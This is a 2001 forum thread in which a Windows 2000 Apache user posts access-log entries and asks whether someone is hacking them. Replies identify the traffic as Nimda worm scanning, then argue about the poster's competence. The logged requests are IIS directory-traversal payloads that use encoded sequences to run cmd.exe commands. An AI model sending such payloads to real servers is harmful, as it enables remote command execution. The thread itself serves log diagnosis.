Hacker probing my system?

I run Apache on my local system (Windows 2000) for development. Lines like this keep appearing in my logs:

207.x.x.x - - [18/Oct/2001:02:58:12 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
207.x.x.x - - [18/Oct/2001:02:58:13 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
207.x.x.x - - [18/Oct/2001:02:58:15 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
207.x.x.x - - [18/Oct/2001:02:58:17 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
207.x.x.x - - [18/Oct/2001:02:58:18 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
207.x.x.x - - [18/Oct/2001:02:58:19 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
207.x.x.x - - [18/Oct/2001:02:58:21 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
207.x.x.x - - [18/Oct/2001:02:58:22 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
207.x.x.x - - [18/Oct/2001:02:58:24 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
207.x.x.x - - [18/Oct/2001:02:58:25 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
207.x.x.x - - [18/Oct/2001:02:58:26 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
207.x.x.x - - [18/Oct/2001:02:58:27 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
207.x.x.x - - [18/Oct/2001:02:58:28 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
207.x.x.x - - [18/Oct/2001:02:58:30 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
207.x.x.x - - [18/Oct/2001:02:58:31 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

It seems like something is trying to access these files every two hours or so and it looks like the IP always starts with '207'. What do you think this is: somebody trying to hack my system, Microsoft update or something, ...?

Appears to be the nimda worm scanning systems.

You need to stay alert of what's going on on the net. This thingy has been spreading all over for months. If you are the type of person who doesn't know how to run a server, just don't run it. IIS or Apache doesn't make any difference.

Months huh? From what I've read so far (yes I'm getting on top of this one) it appeared last month. You also appear to be wrong that it doesn't matter what type of server you run - nimda attempts to take advantage of vulnerabilities in IIS. Apache seems to be immune.

I was referring to your bad practice, not Nimda.

So you're totally up to date and in the know on *all* viruses, worms, etc.? I heard about nimda when it first came out, took the necessary precautions, and forgot about it. Turns out I still don't have to worry about it, except for some extra traffic whose signature I hadn't memorized.

>> So you're totally up to date and in the know on *all* viruses, worms, etc.?

I can't say I am up-to-minute. At the very least I do surf dozen bugtraq sites and mailling lists daily.

>> I heard about nimda when it first came out

Nimda has been out for a while and it's not something new. If you claim to know about it, why posted such a message with a subject of " Hacker probing my system?" in the first place?

>>whose signature I hadn't memorized.<<